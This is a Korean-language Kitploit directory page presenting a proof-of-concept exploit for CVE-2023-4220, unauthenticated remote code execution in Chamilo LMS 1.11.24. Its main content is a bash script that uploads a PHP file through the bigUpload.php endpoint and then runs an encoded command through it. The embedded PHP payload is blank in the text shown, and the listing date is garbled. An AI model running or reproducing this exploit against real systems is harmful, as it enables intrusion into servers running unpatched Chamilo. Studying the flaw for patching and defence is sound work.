Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-4220 — RCE Chamilo 1.11.24 | Kitploit
도구/GitHubGitHub/charlesgargasson/cve-2023-4220
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubcharlesgargasson/cve-2023-4220

CVE-2023-4220

RCE Chamilo 1.11.24

저장소 보기
112년 전아직 검토되지 않음
웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

################################# CVE-2023-4220 RCE Chamilo 1.11.24 #################################

| https://starlabs.sg/advisories/23/23-4220/ | | Chamilo LMS <= 1.11.24 (Beersel 31/08/2023) | 인증되지 않은 파일 원격 코드 실행: "Big Upload" 라이브러리 | | 버전 확인 : /documentation/changelog.html | | POC EXPLOIT CVE RCE VULN |

.. code-block:: bash

#!/bin/bash HOST='http://lms.domain.com' CMD='id'

URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php

EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD" CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))") curl "$HOST/$URL_FILE?aoOoy=$CMD"

|

도구 다운로드